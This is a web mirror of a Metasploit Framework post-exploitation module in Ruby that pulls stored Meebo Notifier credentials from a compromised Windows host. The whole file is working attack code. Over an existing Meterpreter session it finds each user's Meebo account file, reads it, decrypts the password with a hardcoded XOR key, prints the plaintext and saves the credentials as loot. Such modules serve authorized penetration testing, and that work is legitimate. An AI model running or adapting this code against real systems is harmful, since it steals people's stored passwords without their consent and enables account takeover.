Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/meebo.rb
19612 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Auxiliary::Report

8
  include Msf::Post::Windows::UserProfiles

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Windows Gather Meebo Password Extractor',

15
        'Description' => %q{

16
          This module extracts login account password stored by

17
          Meebo Notifier, a desktop version of Meebo's Online Messenger.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => [

21
          'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',

22
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com

23
        ],

24
        'Platform' => [ 'win' ],

25
        'SessionTypes' => [ 'meterpreter' ],

26
        'Compat' => {

27
          'Meterpreter' => {

28
            'Commands' => %w[

29
              core_channel_eof

30
              core_channel_open

31
              core_channel_read

32
              core_channel_write

33
              stdapi_fs_stat

34
            ]

35
          }

36
        },

37
        'Notes' => {

38
          'Stability' => [CRASH_SAFE],

39
          'SideEffects' => [],

40
          'Reliability' => []

41
        }

42
      )

43
    )

44
  end

45


46
  def run

47
    grab_user_profiles.each do |user|

48
      next if user['AppData'].nil?

49


50
      accounts = user['AppData'] + '\\Meebo\\MeeboAccounts.txt'

51


52
      next if accounts.empty?

53


54
      stat = begin

55
        session.fs.file.stat(accounts)

56
      rescue StandardError

57
        nil

58
      end

59
      next if stat.nil?

60


61
      parse_txt(accounts)

62
    end

63
  end

64


65
  def parse_txt(file)

66
    creds = Rex::Text::Table.new(

67
      'Header' => 'Meebo Instant Messenger Credentials',

68
      'Indent'	=> 1,

69
      'Columns' =>

70
      [

71
        'User',

72
        'Password',

73
        'Protocol'

74
      ]

75
    )

76


77
    config = client.fs.file.new(file, 'r')

78
    parse = config.read

79


80
    if (parse =~ /"password.{5}(.*)",\s*"protocol.{4}(\d),\s*"username.{5}(.*)"/)

81
      epass = ::Regexp.last_match(1)

82
      protocol = ::Regexp.last_match(2).to_i

83
      username = ::Regexp.last_match(3)

84
    else

85
      print_error('Could not extract credentials from file')

86
      return

87
    end

88


89
    case protocol

90
    when 0

91
      protocol = 'Meebo'

92
    when 1

93
      protocol = 'AIM'

94
    when 2

95
      protocol = 'Yahoo IM'

96
    when 3

97
      protocol = 'Windows Live'

98
    when 4

99
      protocol = 'Google Talk'

100
    when 5

101
      protocol = 'ICQ'

102
    when 6

103
      protocol = 'Jabber'

104
    when 7

105
      protocol = 'Myspace IM'

106
    end

107


108
    passwd = decrypt(epass)

109
    print_good("*** Protocol: #{protocol}  User: #{username}  Password: #{passwd}  ***")

110
    creds << [username, passwd, protocol]

111
    config.close

112


113
    if passwd.nil? || username.nil?

114
      print_status('Meebo credentials have not been found')

115
      return

116
    end

117


118
    print_status('Storing data...')

119
    path = store_loot(

120
      'meebo.user.creds',

121
      'text/csv',

122
      session,

123
      creds.to_csv,

124
      'meebo_user_creds.csv',

125
      'Meebo Notifier User Credentials'

126
    )

127


128
    print_good("Meebo Notifier user credentials saved in: #{path}")

129
  rescue StandardError => e

130
    print_error("An error has occurred: #{e}")

131
  end

132


133
  def decrypt(epass)

134
    magicarr = [

135
      4, 240, 122, 53, 65, 19, 163, 124, 109,

136
      73, 187, 3, 34, 93, 15, 138, 11, 153, 148, 147, 146,

137
      222, 129, 160, 199, 104, 240, 43, 89, 105, 204, 236,

138
      253, 168, 96, 48, 158, 143, 173, 60, 215, 104, 112,

139
      149, 15, 114, 107, 4, 92, 149, 48, 177, 42, 133, 124,

140
      152, 63, 137, 2, 40, 84, 131

141
    ]

142


143
    plaintext = [epass].pack('H*').unpack('C*')

144


145
    for i in 0..plaintext.length - 1 do

146
      plaintext[i] ^= magicarr[i]

147
    end

148


149
    return plaintext.pack('C*')

150
  end

151
end

152


153